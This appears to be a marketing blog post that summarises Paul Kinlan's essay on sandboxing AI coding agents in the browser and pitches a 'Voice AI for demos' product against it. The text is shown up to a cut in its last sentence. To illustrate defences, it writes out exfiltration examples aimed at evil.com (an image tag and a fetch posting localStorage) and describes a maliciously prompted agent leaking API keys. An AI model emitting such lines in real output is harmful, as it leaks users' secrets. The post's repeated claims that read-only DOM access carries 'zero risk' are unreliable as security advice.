# Paul Kinlan: "The Browser is the Sandbox" (90 HN Points, 45 Comments)—AI Coding Agents Need Filesystem/Network/Execution Isolation—Voice AI for Demos Takes Opposite Approach: Read-Only DOM Access, No File Changes, Zero Network Risk
## Meta Description
Paul Kinlan's "The Browser is the Sandbox" essay (90 HN points) shows how AI coding agents need three-layer isolation (filesystem, network, execution) to run untrusted code safely. Voice AI for demos takes the opposite approach: read-only DOM access eliminates filesystem risk, client-side execution blocks network exfiltration, behavioral guidance needs zero code execution—proving sandboxing is overkill when you don't write files or run code.
## Introduction: The Sandbox Problem for AI Agents
A Google Chrome Developer Advocate just published a 90-point Hacker News essay arguing **AI coding agents need robust sandboxing** to prevent catastrophic damage. Paul Kinlan's "The Browser is the Sandbox" describes how tools like Claude Cowork (which edits files on your machine) require three layers of isolation: filesystem lockdown (preventing access to parent directories), network control (blocking data exfiltration), and execution sandboxing (running untrusted code safely).
The threat model is real: **an AI agent with file access + network access + code execution = potential disaster**. It could extract SSH keys, exfiltrate sensitive data via image URLs, create malicious .docx files with macros, or delete critical files without undo. Paul builds "Co-do" (browser-based AI file manager) to demonstrate sandboxing using File System Access API (chroot-like directory jail), CSP headers (network lockdown), and Web Workers + WebAssembly (execution isolation).
But here's the insight Voice AI for demos reveals: **most AI assistance doesn't need file access, network control, or code execution**. Demos don't edit your filesystem—they read DOM structure. Demos don't exfiltrate data—they run client-side. Demos don't execute untrusted code—they deliver voice guidance based on behavioral patterns. **When you eliminate write operations, network dependencies, and code execution, you eliminate the need for complex sandboxing entirely.**
This article analyzes Paul Kinlan's sandboxing framework (trending on HN with 45 comments), extracts the three-layer isolation model, and demonstrates how Voice AI sidesteps all three risks by choosing read-only DOM access over file manipulation. We'll cover why coding agents need sandboxing (file edits = permanent damage), how browsers provide three isolation layers (filesystem APIs, CSP iframes, Web Workers), and why demo guidance needs zero sandboxing (DOM reading is inherently safe, client-side execution blocks exfiltration, behavioral nudges require no code changes). If you're building AI tools and wondering whether you need sandboxing, Paul's essay reveals when isolation is critical—and Voice AI shows when it's unnecessary.
---
## The Three-Layer Sandboxing Model: Filesystem, Network, Execution
### Why AI Coding Agents Need Isolation
Paul Kinlan starts with the threat model:
> "One of the worries that people rightly have is giving unfettered access to a tool that you don't know how it works and can perform destructive actions on your data."
**Anthropic's Claude Cowork** is a coding agent that edits files on your machine. It can create, modify, and delete files across your entire project directory. The risk: if the AI makes a mistake (or is maliciously prompted), it could:
- Delete critical configuration files (no undo!)
- Extract SSH keys from `~/.ssh` and exfiltrate them
- Create malicious .docx files with macros that execute when opened
- Modify package.json to include malware dependencies
- Overwrite production code with broken implementations
**This isn't theoretical**—Paul admits he runs Claude Code in a way that is "a bit risky," without constraining filesystem access, relying on monitoring interactions to maintain control. But for regular users, this model is untenable: **you can't expect users to audit every file operation before approving it**.
Anthropic solves this with their [sandbox-runtime](https://github.com/anthropic-experimental/sandbox-runtime): a VM that locks down the agent to only the user-selected directory with limited network access. Paul asks: **Can the browser provide equivalent sandboxing without running a multi-GB local container?**
### The Browser's Three Sandboxing Layers
Paul identifies three areas needing isolation:
**Layer 1: The Filesystem**
> "You don't want an autonomous system to be able to change files without permission, or reach out past where the user has given access. You also probably want some sort of backup."
**Browser solution**: File System Access API
- **Read-only access**: `showDirectoryPicker()` lets the user select a folder, and the browser can hand back a read-only handle
- **Origin-private filesystem**: The browser gives each app its own private filesystem (not the user's actual files)
- **Full access to selected folder**: The File System Access API provides a read+write handle to the user-selected directory with a **chroot-like** restriction—it can't access parent directories or siblings
**Why this matters**: File System Access API creates a "filesystem jail" where the AI agent can only operate within the boundary the user approved. It can't reach up to `~/.ssh`, can't access sibling projects, can't escape the granted directory.
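The jail guarantee can be expressed as a simple path rule. A hypothetical sketch (the real File System Access API enforces this natively; the function below only illustrates the invariant a granted directory handle obeys):

```javascript
// Hypothetical helper: a relative path stays "inside the jail" only if
// its ".." segments never climb above the granted root directory.
function isInsideJail(relativePath) {
  let depth = 0;
  for (const part of relativePath.split("/")) {
    if (part === "" || part === ".") continue;
    depth += part === ".." ? -1 : 1;
    if (depth < 0) return false; // would escape the granted root
  }
  return true;
}
```

So `docs/notes.md` passes, while `../.ssh/id_rsa` is rejected before any file operation happens.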
**Layer 2: The Network**
> "How do we ensure that the data remains within our control? We have to be able to completely control the network."
**Browser solution**: Content Security Policy (CSP)
- **Blunt lockdown**: Start with `default-src 'none'` (block everything), selectively allow specific origins
- **LLM provider whitelist**: Only allow connections to `api.anthropic.com`, `api.openai.com`, `generativelanguage.googleapis.com`
- **Block exfiltration vectors**: Prevent markup like `<img src="https://evil.com/?data=...">` from sending data via image requests
**Why this matters**: Without network control, malicious prompts could craft URLs embedding sensitive file contents in image sources, fetch requests, or beacon API calls. CSP blocks all network requests except to approved LLM providers.
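In practice, the lockdown Paul describes is a single response header. This sketch mirrors the provider whitelist above (exact directives would vary per app):

```http
Content-Security-Policy:
  default-src 'none';
  connect-src 'self'
    https://api.anthropic.com
    https://api.openai.com
    https://generativelanguage.googleapis.com
```

Everything is denied by default; only connections to the three LLM providers (and the page's own origin) survive.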
**Layer 3: The Execution Environment**
> "You are running code that someone somewhere has created (similar to sandbox-exec on macOS)."
**Browser solution**: Web Workers + WebAssembly
- **Web Workers**: Isolate code execution off the main thread, separate from DOM manipulation
- **WebAssembly**: Run compiled binaries (e.g., SQLite, ffmpeg) with robust security model designed for untrusted code
- **Inherited CSP**: Workers inherit parent's CSP constraints, blocking unauthorized network access even from WASM modules
**Why this matters**: AI coding agents often run user-provided code or LLM-generated scripts. Without execution isolation, malicious code could access DOM APIs, exfiltrate data, or modify page state.
### The Double-Iframe Technique for LLM Output
Paul describes a clever trick for sandboxing LLM-generated content:
**Outer iframe**: Sets CSP policy (`default-src 'none'`) acting as "network firewall"
**Inner iframe**: Holds untrusted LLM output, isolated onto separate origin
```html
<!-- Outer iframe: the "network firewall". The csp attribute (Blink-only)
     forces everything inside it to inherit default-src 'none'. -->
<iframe csp="default-src 'none'" src="outer-frame.html"></iframe>

<!-- Inside outer-frame.html: the inner iframe holds the untrusted
     LLM output, isolated onto a separate, sandboxed origin. -->
<iframe sandbox srcdoc="...untrusted LLM output..."></iframe>
```
**The result**: Even if the LLM generates `<img src="https://evil.com/?data=secrets">`, the outer iframe's CSP blocks the fetch request immediately. The inner iframe can't escape its sandbox.
**The trade-off**: This double-iframe is "incredibly wasteful"—two full DOMs for every piece of untrusted content. But it's necessary when you're running LLM-generated code that might be hostile.
---
## Co-do Demo: Putting Browser Sandboxing Into Practice
### What Co-do Does
Paul builds [co-do.xyz](http://co-do.xyz) to demonstrate browser-based AI agent sandboxing:
**Functionality**:
- User selects folder on machine (File System Access API)
- Configures AI provider (Anthropic/OpenAI/Google) with API key
- AI performs file operations: list files, create documents, search content, compare files
- Runs pre-compiled WASM tools (e.g., sha256 hash) in Web Workers
**Sandboxing implementation**:
1. **Filesystem isolation**: File System Access API grants access only to selected folder—can't reach parent directories or `~/.ssh`
2. **Network lockdown**: CSP allows `connect-src 'self' https://api.anthropic.com https://api.openai.com https://generativelanguage.googleapis.com`—only AI providers receive data
3. **LLM output sandboxing**: AI responses render in iframes with `allow-same-origin` but NOT `allow-scripts`—LLM can't inject executable JavaScript
4. **Execution isolation**: WASM tools run in fresh Web Workers with inherited CSP—even WASM modules can't make unauthorized network requests
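Point 3 above comes down to a single attribute choice. A minimal sketch (the srcdoc content is illustrative):

```html
<!-- LLM output rendered with same-origin access (so the host page can
     measure its content height) but with scripts disabled: the sandbox
     list deliberately omits "allow-scripts". -->
<iframe sandbox="allow-same-origin"
        srcdoc="<h2>AI summary</h2><p>...rendered markdown...</p>">
</iframe>
```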
**Example workflow**:
1. User: "Create a summary file of all markdown documents and hash it with sha256"
2. AI plans: Read all .md files, generate summary, write new file, run sha256 tool
3. Browser prompts: "Allow write access to create summary.md?" → User approves
4. WASM worker: Runs sha256 in isolated Worker, returns hash
5. AI delivers: Summary file created, hash displayed, no data exfiltrated
### Known Gaps in Browser Sandboxing
Paul honestly lists limitations:
**Gap 1: You still trust the LLM provider**
> "Your file contents get sent to Anthropic, OpenAI, or Google for processing. CSP ensures data only goes there, but 'there' is still a third party."
**Gap 2: Malicious file creation is possible**
> "The LLM could create a .docx with macros, a .bat file, or a malicious script that's harmless in the browser but dangerous when opened by another application."
**Gap 3: allow-same-origin trade-offs**
> "The markdown iframe needs this to calculate content height for proper display. This means I can't run scripts and have same-origin access without the iframe being able to escape its sandbox."
**Gap 4: CSP might not block everything**
> "What about the Beacon API queuing requests? DNS prefetch for resources? A chrome://net-export/ dump looked clean, but I don't have complete certainty."
**Gap 5: No undo**
> "If you grant write permission and the LLM deletes a file, it's gone. Co-do has granular permissions (always allow, ask each time, never allow) but no backup system."
**Gap 6: Permission fatigue**
> "Asking users to approve every operation is secure but annoying. Letting users blanket-allow operations is convenient but risky."
**Gap 7: Cross-browser limitations**
> "The csp attribute on iframes only works in Blink-based browsers. Safari's File System Access API lacks showDirectoryPicker, making local folder editing impossible."
**The conclusion**: Browser sandboxing is robust but imperfect. It's suitable for AI coding agents because the value (automated file edits) outweighs the risks (trusted provider, permission fatigue, no undo). But for tasks that don't need file writes, **all this complexity is overkill**.
---
## Voice AI's Opposite Approach: No Filesystem, No Network, No Execution
### Why Demos Don't Need File Access
Voice AI for demos sidesteps Paul's entire sandboxing framework by **eliminating write operations entirely**:
**Coding Agent (Co-do)**:
- Needs: Read files, create files, modify files, delete files
- Risk: Delete SSH keys, overwrite production code, create malicious .docx
- Solution: File System Access API + chroot-like jail + permission prompts
**Demo Guidance (Voice AI)**:
- Needs: Read DOM structure (visible elements, form fields, buttons)
- Risk: None—DOM reading is read-only by definition
- Solution: No filesystem API needed, no permission prompts required
**The difference**: Co-do manipulates your filesystem (files are changed, potentially destroyed). Voice AI reads the browser's DOM (nothing is modified, no data is written). **Read-only access requires zero sandboxing because there's nothing to protect against.**
### Example: Voice AI Reading DOM vs Co-do Editing Files
**Co-do workflow (requires sandboxing)**:
1. User: "Create a summary of all markdown files"
2. AI: Reads file1.md, file2.md, file3.md from filesystem
3. AI: Generates summary content
4. AI: Writes summary.md to filesystem (**permanent change, needs permission**)
5. Risk: If AI makes mistake, it could overwrite critical file or create malicious document
**Voice AI workflow (no sandboxing needed)**:
1. User lands on pricing page
2. Voice AI: Reads DOM (detects pricing tiers, user hovering over "Enterprise" option)
3. Voice AI: Delivers prompt: "You're comparing Enterprise vs Pro—Enterprise adds SSO, but Pro has everything you need for teams under 50. Most companies your size pick Pro."
4. Risk: None—no files written, no data modified, DOM reading is read-only
**The pattern**: Co-do's value comes from **writing files** (automation), which creates risk (destructive edits). Voice AI's value comes from **reading DOM** (guidance), which creates zero risk (read-only operation). When you don't write, you don't need filesystem sandboxing.
### Why Demos Don't Need Network Control
Paul's network sandboxing (CSP headers, origin whitelisting) prevents data exfiltration:
**Co-do threat model**:
- LLM generates: `<img src="https://evil.com/?data=FILE_CONTENTS">`
- Without CSP: Image request sends sensitive file contents to attacker's server
- With CSP: `default-src 'none'` blocks image request, data stays local
**Voice AI threat model**:
- Voice AI generates: Voice prompt based on DOM reading: "You're on the pricing page, comparing tiers"
- Network risk: None—voice prompts are client-side strings, no network requests involved
- CSP needed: Zero—no LLM output renders in DOM, no images/scripts generated
**The difference**: Co-do sends file contents to LLM provider for processing, then renders LLM-generated HTML (which might contain exfiltration vectors). Voice AI generates prompts client-side based on DOM patterns, never sending DOM contents anywhere. **Client-side execution eliminates network exfiltration risk entirely.**
### Example: Co-do Network Risk vs Voice AI Client-Side Safety
**Co-do network attack vector**:
1. User shares folder containing `.env` file with API keys
2. AI reads `.env`, sends contents to LLM provider for processing
3. Malicious prompt: "Create HTML summary of files"
4. LLM generates: `<img src="https://evil.com/?key=API_KEY">` embedded in HTML
5. Without CSP: Browser loads image, exfiltrates API key to attacker
6. With CSP: CSP blocks image request, preventing exfiltration
**Voice AI attack prevention**:
1. User navigates pricing page
2. Voice AI reads DOM: pricing tiers, current hover state, scroll position
3. Voice AI generates prompt client-side: "Comparing tiers? Pro fits teams under 50."
4. No network request: Prompt delivered locally, never sent to server
5. No exfiltration vector: DOM reading stays in browser, no external communication
**The pattern**: Co-do must send data to LLM provider (file contents leave user's machine), creating exfiltration risk that CSP mitigates. Voice AI processes DOM locally (data never leaves browser), eliminating exfiltration risk entirely. **When execution is client-side, network sandboxing is unnecessary.**
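The client-side flow above can be sketched as a pure function of observed page state. Names and thresholds here are illustrative, not a real API; the point is that the output is a string computed locally, with no network call anywhere:

```javascript
// Hypothetical sketch: choose a behavioral nudge from page state the
// browser has already rendered. Pure function, no writes, no requests.
function pickPrompt(state) {
  if (state.page === "pricing" && state.hoveredTier === "enterprise") {
    return "Comparing Enterprise vs Pro? Pro covers teams under 50.";
  }
  if (state.idleSeconds > 30 && state.emptyFields >= 5) {
    return "This form looks long. Want the pre-filled demo instead?";
  }
  return null; // stay silent rather than guess
}
```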
### Why Demos Don't Need Execution Isolation
Paul uses Web Workers + WebAssembly to sandbox code execution:
**Co-do execution risk**:
- AI needs to run user-provided code or LLM-generated scripts
- Risk: Malicious code accesses DOM APIs, modifies page state, exfiltrates data
- Solution: Isolate execution in Web Workers (off the main thread), inherit CSP constraints
**Voice AI execution model**:
- Voice AI delivers behavioral guidance: "Click here," "You're on pricing page"
- Risk: None—no code execution involved, just text prompts based on DOM patterns
- Solution: No workers needed, no WASM required, execution sandboxing irrelevant
**The difference**: Co-do runs untrusted code (LLM-generated scripts, user-provided tools), which could be malicious. Voice AI delivers text prompts (behavioral nudges), which can't execute arbitrary code. **When you don't run code, you don't need execution isolation.**
### Example: Co-do Execution Risk vs Voice AI Guidance Safety
**Co-do execution attack scenario**:
1. User: "Run a script to analyze my code quality"
2. AI generates script: `analyzeCode.js`
3. Script contains: `fetch("https://evil.com/steal", { method: "POST", body: localStorage })`
4. Without Web Worker isolation: Script runs in main thread, accesses localStorage, exfiltrates data
5. With Web Worker + CSP: Worker inherits CSP, fetch blocked, exfiltration prevented
**Voice AI guidance flow**:
1. User stuck on onboarding form
2. Voice AI reads DOM: Form has 8 fields, user hasn't typed anything for 30 seconds
3. Voice AI delivers prompt: "This form looks long—most users skip to the pre-filled demo instead. Want to try that?"
4. No code execution: Just a text prompt, user decides whether to follow suggestion
5. No attack surface: No script runs, no localStorage accessed, no exfiltration possible
**The pattern**: Co-do executes code generated by LLM or provided by user, creating risk that Web Workers mitigate. Voice AI delivers text-based guidance based on DOM state, requiring zero code execution. **When your value proposition is guidance not automation, execution sandboxing is overkill.**
---
## The Filesystem/Network/Execution Trade-Off: When Sandboxing Is Necessary vs Unnecessary
### When You NEED Sandboxing (Coding Agents)
Paul's sandboxing framework is **essential** when AI tools have these characteristics:
**Characteristic 1: File Write Operations**
- **Need**: AI edits, creates, or deletes files on user's machine
- **Risk**: Destructive edits, malicious file creation, data loss
- **Solution**: File System Access API + chroot-like jail + permission prompts
**Characteristic 2: Network-Dependent Functionality**
- **Need**: Send user data to LLM provider for processing
- **Risk**: Data exfiltration via crafted URLs, image sources, fetch requests
- **Solution**: CSP headers + origin whitelisting + double-iframe technique
**Characteristic 3: Code Execution Requirements**
- **Need**: Run user-provided scripts, LLM-generated code, WASM tools
- **Risk**: Malicious code accesses APIs, modifies state, exfiltrates data
- **Solution**: Web Workers + inherited CSP + execution isolation
**Examples needing sandboxing**:
- **Claude Cowork**: Edits project files, runs build tools, modifies configuration → needs all three layers
- **Co-do**: Creates/modifies files in selected directory, calls LLM APIs, runs WASM tools → needs all three layers
- **GitHub Copilot Workspace**: Generates code changes, runs tests, commits to repository → needs all three layers
**The pattern**: If your AI tool **writes data, sends data, or executes code**, you need sandboxing to prevent catastrophic damage.
### When You DON'T NEED Sandboxing (Demo Guidance)
Voice AI sidesteps all three sandboxing requirements:
**Characteristic 1: Read-Only DOM Access**
- **Need**: Read visible elements, form state, scroll position
- **Risk**: None—DOM reading doesn't modify anything
- **Solution**: No filesystem API needed, read-only by default
**Characteristic 2: Client-Side Execution**
- **Need**: Generate prompts based on DOM patterns (local processing)
- **Risk**: None—no data sent to servers, everything stays in browser
- **Solution**: No CSP needed, no network requests involved
**Characteristic 3: Zero Code Execution**
- **Need**: Deliver text-based behavioral nudges ("Click here," "Compare tiers")
- **Risk**: None—prompts are strings, not executable code
- **Solution**: No workers needed, no WASM required, execution isolation irrelevant
**Examples not needing sandboxing**:
- **Voice AI for demos**: Reads DOM, delivers prompts, guides navigation → no writes, no network, no execution
- **Accessibility tools**: Read page structure, announce content, highlight elements → read-only, client-side, no code
- **Analytics trackers**: Monitor clicks, scrolls, hovers → read DOM events, no file access, no execution
**The pattern**: If your AI tool **only reads data, processes locally, and delivers guidance**, sandboxing is unnecessary overhead.
### The Performance/Complexity Cost of Sandboxing
Paul's Co-do demonstrates the **overhead** of browser sandboxing:
**Filesystem sandboxing cost**:
- **Permission prompts**: User must approve every file write operation
- **Permission fatigue**: "Always allow" reduces security, "ask each time" reduces usability
- **No undo**: Deleted files are gone, no backup system in browser sandbox
**Network sandboxing cost**:
- **CSP configuration**: Manually setting `default-src 'none'`, selectively allowing origins
- **Double-iframe overhead**: Two full DOMs loaded for every piece of untrusted content
- **Cross-browser limitations**: `csp` attribute only works in Blink, Safari lacks `showDirectoryPicker`
**Execution sandboxing cost**:
- **Web Worker overhead**: Creating fresh workers for every tool execution
- **WASM compilation**: Compiling binaries for safe execution adds latency
- **CSP inheritance complexity**: Ensuring workers inherit parent CSP without gaps
Voice AI avoids all these costs:
- **No permission prompts**: Read-only DOM access doesn't require user approval
- **No CSP configuration**: Client-side execution doesn't send data anywhere
- **No workers/WASM**: Text-based prompts don't execute code
**The result**: Co-do's sandboxing overhead is justified because file writes are valuable but risky. Voice AI's lack of sandboxing is an advantage because DOM reading is safe and cheap.
---
## The Browser's 30-Year Security Model: Built for Untrusted Code, Overbuilt for Trusted Guidance
### Why Browsers Are Sandboxing Experts
Paul's key insight:
> "Over the last 30 years, we have built a sandbox specifically designed to run incredibly hostile, untrusted code from anywhere on the web, the instant a user taps a URL."
**The browser's threat model**: Every website is potentially malicious. Clicking a link (`https://paul.kinlan.me/`) could load code that:
- Tries to access your filesystem → Blocked by origin isolation
- Attempts to steal cookies → Prevented by SameSite policies
- Exfiltrates data via images → Stopped by CSP
- Executes malicious scripts → Sandboxed by same-origin policy
**The result**: Browsers are **experts at running untrusted code safely**. Paul argues this makes them ideal for AI coding agents: "The browser's 30-year-old security model, built for running hostile code from strangers the moment you click a link, might be better suited for agentic AI than we give it credit for."
### When the Sandbox Is Overkill
But here's the irony: **most web applications aren't hostile, and most AI tools aren't coding agents**.
**The browser's sandbox is designed for worst-case scenarios**:
- Website could be malware → Isolate origins
- Script could steal data → Block cross-origin requests
- Code could access filesystem → Deny file access by default
**But most web tools are cooperative, not hostile**:
- Analytics tools read DOM to track behavior → No filesystem risk
- Accessibility tools announce page structure → No network exfiltration
- Voice AI guides navigation → No code execution
**The mismatch**: Browser sandboxing is built for **untrusted code from strangers**. Demo guidance is **trusted assistance from chosen tools**. Applying Paul's three-layer sandboxing to Voice AI would be like requiring a TSA checkpoint to enter your own home—technically secure, but solving a problem that doesn't exist.
### Example: Browser Sandboxing Overkill for Voice AI
**If Voice AI used Paul's sandboxing framework unnecessarily**:
**Layer 1: Filesystem sandboxing**
- **Requirement**: User selects directory via File System Access API
- **Permission prompt**: "Allow Voice AI to read your pricing page folder?"
- **Overhead**: Chroot-like jail prevents accessing parent directories
- **Reality**: Voice AI doesn't access filesystem—it reads DOM, which is already in browser memory
**Layer 2: Network sandboxing**
- **Requirement**: CSP headers block all requests except whitelisted origins
- **Configuration**: `default-src 'none'; connect-src 'self'`
- **Overhead**: Double-iframe technique to prevent LLM output exfiltration
- **Reality**: Voice AI generates prompts client-side—no LLM requests, no network involved
**Layer 3: Execution sandboxing**
- **Requirement**: Run prompts in Web Workers with inherited CSP
- **WASM compilation**: Compile voice synthesis engine for safe execution
- **Overhead**: Fresh worker for every prompt delivery
- **Reality**: Voice AI delivers text strings—no code execution, just DOM reading + string output
**The result**: All three sandboxing layers solve problems Voice AI doesn't have. File writes that Voice AI doesn't do. Network exfiltration of data Voice AI doesn't send. Code execution Voice AI doesn't perform.
**Paul's conclusion about sandboxing**: "Is it perfect? No. But I think it demonstrates that the browser's 30-year-old security model might be better suited for agentic AI than we give it credit for."
**Voice AI's counter-conclusion**: "Sandboxing is perfect for coding agents that write files. But for demo guidance that reads DOM, the browser's default security model (read-only DOM access, client-side execution) is already sufficient."
---
## The "No Undo" Problem: Why File Writes Need Sandboxing But DOM Reads Don't
### Co-do's Biggest Gap: Permanent Deletion
Paul honestly identifies Co-do's scariest limitation:
> "No undo. If you grant write permission and the LLM deletes a file, it's gone. Co-do has granular permissions (always allow, ask each time, never allow) but no backup system."
**The problem**: Browser sandboxing prevents *unauthorized* file writes (AI can't access files outside granted directory), but it doesn't prevent *authorized* file destruction. If you grant write permission and the AI makes a mistake, **the file is permanently deleted**.
**Why this matters for coding agents**:
1. User: "Clean up temporary files in this directory"
2. AI interprets: Delete all files matching `*.tmp`
3. AI bug: Deletes all files matching `*` instead (removes wildcard filter)
4. Result: Entire directory wiped, no recovery possible
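The failure mode in steps 2-3 is one dropped extension filter. An illustrative (hypothetical) helper makes the gap concrete:

```javascript
// Illustrative only: the difference between the intended "*.tmp" filter
// and the buggy "*" filter described above.
function filesToDelete(files, pattern) {
  if (pattern === "*") return [...files];   // the bug: selects everything
  const ext = pattern.replace(/^\*/, "");   // "*.tmp" -> ".tmp"
  return files.filter((name) => name.endsWith(ext));
}
```

With `"*.tmp"` only temp files are selected; with `"*"` the entire directory is queued for deletion, and without a backup layer there is nothing to roll back.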
**Mitigation options**:
- **Permission prompts**: Ask before every delete → Mitigates risk but creates permission fatigue
- **Backup system**: Copy files before deletion → Adds complexity, doubles storage
- **Undo stack**: Track all changes, allow reversal → Requires persistent state, complex rollback logic
**Paul's assessment**: All three options have trade-offs. Permission prompts are secure but annoying. Backups prevent data loss but add overhead. Undo stacks are powerful but complex to implement.
### Voice AI's Solution: Never Write Anything
Voice AI sidesteps the "no undo" problem by **never modifying data in the first place**:
**Voice AI operations (all read-only)**:
1. Read DOM: Detect pricing tiers, form fields, scroll position
2. Generate prompt: "You're comparing Enterprise vs Pro"
3. Deliver guidance: Voice output or text overlay
4. User acts: Clicks button, fills form, scrolls page
5. Repeat: Read new DOM state, generate new prompt
**No writes means**:
- **No deletion risk**: Can't delete files you never access
- **No corruption risk**: Can't overwrite data you never modify
- **No undo needed**: Everything is read-only, nothing changes
**Example: Voice AI vs Co-do on "Clean Up" Task**
**Co-do (needs undo)**:
1. User: "Clean up my project directory"
2. AI: Deletes `node_modules`, `.cache`, `*.log` files
3. Bug: Accidentally deletes `package.json` too
4. Result: Project broken, no undo, user must restore from git or backups
**Voice AI (no undo needed)**:
1. User: Viewing project dashboard with file list
2. Voice AI reads DOM: Detects large `node_modules` folder (500MB)
3. Voice AI suggests: "Your node_modules folder is 500MB—want to run `npm prune` to remove unused packages?"
4. User decides: Clicks "Yes" to run command or "No" to ignore
5. Result: User maintains control, Voice AI just provides guidance, nothing automated without approval
**The pattern**: Co-do automates file operations (deletion, modification), which creates risk requiring undo. Voice AI guides user actions (suggestions, prompts), which creates zero risk because user controls execution. **When you don't write, undo becomes irrelevant.**
---
## The Permission Fatigue Problem: Sandboxing Security vs Usability
### Co-do's Trade-Off: Approve Every Operation or Allow Everything
Paul describes the permission tension:
> "Asking users to approve every operation is secure but annoying. Letting users blanket-allow operations is convenient but risky. I've tried to find a middle ground, but the fundamental tension remains."
**Co-do's permission model**:
- **Ask each time**: User approves every file read/write → Secure but creates permission fatigue
- **Always allow**: User grants blanket permission → Convenient but enables destructive automation
- **Never allow**: User blocks operation → Protects data but prevents AI from helping
**Real-world scenario**:
1. User: "Analyze all markdown files and create a summary"
2. AI needs permissions:
- Read file1.md → Prompt: "Allow read access to file1.md?"
- Read file2.md → Prompt: "Allow read access to file2.md?"
- Read file3.md → Prompt: "Allow read access to file3.md?"
- Write summary.md → Prompt: "Allow write access to create summary.md?"
3. User clicks "Allow" 4 times → Task completes, but permission prompts are exhausting
4. Alternative: User clicks "Always allow" → No more prompts, but AI can now delete files without asking
**The dilemma**: Security requires explicit permission for every destructive operation. Usability requires minimizing permission prompts. Co-do can't optimize both simultaneously.
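The three modes reduce to a small decision function. A hypothetical sketch, where `promptUser` stands in for a real confirmation dialog:

```javascript
// Hypothetical sketch of Co-do's three permission modes.
function decide(mode, promptUser) {
  switch (mode) {
    case "always-allow": return true;          // convenient, but risky
    case "never-allow": return false;          // safe, but blocks the AI
    case "ask-each-time": return promptUser(); // secure, but fatiguing
    default: throw new Error("unknown mode: " + mode);
  }
}
```

The tension lives entirely in the third branch: every call to `promptUser()` is one more interruption, and the only way to remove it is to fall into one of the other two branches.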
### Voice AI's Solution: Read-Only Operations Need No Permissions
Voice AI eliminates permission prompts by **only reading data that's already visible**:
**Voice AI operations (no permissions needed)**:
1. Read DOM: User's browser already loaded this data (pricing tiers, form fields)
2. Analyze behavior: User's scrolling/hovering is observable without permission
3. Generate prompt: Client-side processing doesn't access sensitive data
4. Deliver guidance: Voice output doesn't modify anything
**No permissions means**:
- **No prompts**: User never interrupted with "Allow Voice AI to read this page?"
- **No fatigue**: Zero permission decisions required
- **No risk**: Read-only access can't cause damage
**Example: Voice AI vs Co-do on "Analyze Files" Task**
**Co-do (permission prompts)**:
1. User: "Analyze all markdown files"
2. Prompt: "Allow read access to file1.md?" → User clicks "Allow"
3. Prompt: "Allow read access to file2.md?" → User clicks "Allow"
4. Prompt: "Allow read access to file3.md?" → User clicks "Allow"
5. Result: 3 permission prompts for a single task
**Voice AI (no prompts)**:
1. User: Viewing documentation page with 3 sections
2. Voice AI reads DOM: Detects section headers, current scroll position
3. Voice AI suggests: "You're reading Installation—most users check API Reference next. Want to jump there?"
4. Result: Zero permission prompts, user just hears suggestion and decides
**The pattern**: Co-do's file access requires user approval for every operation (permission fatigue). Voice AI's DOM reading uses data already loaded in browser (no approval needed). **When you only read what's already visible, permission prompts are unnecessary.**
---
## The "Still Trust the Provider" Gap: Client-Side vs Server-Side Processing
### Co-do's Unavoidable Trust Requirement
Paul acknowledges Co-do's biggest known gap:
> "You're still trusting the LLM provider. Your file contents get sent to Anthropic, OpenAI, or Google for processing. CSP ensures data only goes there, but 'there' is still a third party."
**Why this matters**:
- **Data leaves user's machine**: File contents sent to LLM provider for processing
- **Provider sees everything**: LLM provider has access to all file data, including potentially sensitive information
- **CSP mitigates exfiltration**: CSP ensures data only goes to approved providers (not evil.com), but provider itself is trusted
**Scenarios requiring provider trust**:
1. User shares folder containing `.env` file with API keys
2. AI reads `.env`, sends contents to OpenAI for "summarize my configuration" task
3. OpenAI processes request, returns summary
4. Risk: OpenAI now has your API keys (trusted not to misuse them)
**Paul's mitigation**: "A fully local model would solve this, but we're not quite there yet for capable models in the browser."
**The trade-off**: Co-do's value (automated file operations) requires LLM processing, which requires sending data to provider. Users must trust Anthropic/OpenAI/Google not to misuse file contents.
### Voice AI's Client-Side Advantage: Zero Provider Trust Needed
Voice AI eliminates the trust gap by **processing everything locally**:
**Voice AI workflow (entirely client-side)**:
1. User navigates pricing page
2. Voice AI reads DOM: Pricing tiers, user's current hover state, scroll position
3. Voice AI analyzes patterns: User hovering over "Enterprise" tier for 30 seconds without clicking
4. Voice AI generates prompt: "Comparing Enterprise vs Pro? Pro has everything you need for teams under 50."
5. Voice AI delivers: Text or voice output, entirely in browser
**No server communication means**:
- **No data sent**: DOM contents never leave user's machine
- **No provider trust**: No LLM provider involved, nothing to trust
- **No exfiltration risk**: Client-side execution eliminates network attack surface
**Example: Co-do vs Voice AI on Sensitive Data**
**Co-do (provider sees data)**:
1. User: "Summarize my .env file"
2. Co-do reads: `API_KEY=secret123, DATABASE_URL=postgres://...`
3. Co-do sends to OpenAI: Full .env contents for summarization
4. OpenAI processes: Returns "You have 5 environment variables including API key and database URL"
5. Trust required: User must trust OpenAI not to log/misuse API_KEY value
**Voice AI (provider sees nothing)**:
1. User: Viewing settings page with API key input field
2. Voice AI reads DOM: Detects input field labeled "API Key", current value is masked (`********`)
3. Voice AI analyzes: User hasn't entered anything, cursor hovering over field
4. Voice AI suggests: "Need an API key? Most users generate one from the integrations page first."
5. Trust required: Zero—Voice AI never sees API key value, everything processed client-side
**The pattern**: Co-do sends file contents to LLM provider (requires trust), Voice AI processes DOM locally (requires zero trust). **When execution is client-side, provider trust becomes irrelevant.**
---
## The Cross-Browser Limitation: When Sandboxing Standards Don't Align
### Paul's Browser Compatibility Challenges
Paul identifies a critical gap in browser sandboxing standards:
**Gap 1: CSP attribute browser support**
> "The csp attribute on iframes only works in Blink-based browsers. The double-iframe technique works everywhere but it's wasteful and awkward."
**What this means**:
- **Blink (Chrome/Edge)**: the `csp` attribute on iframes works natively; other engines must fall back to the "wasteful and awkward" double-iframe technique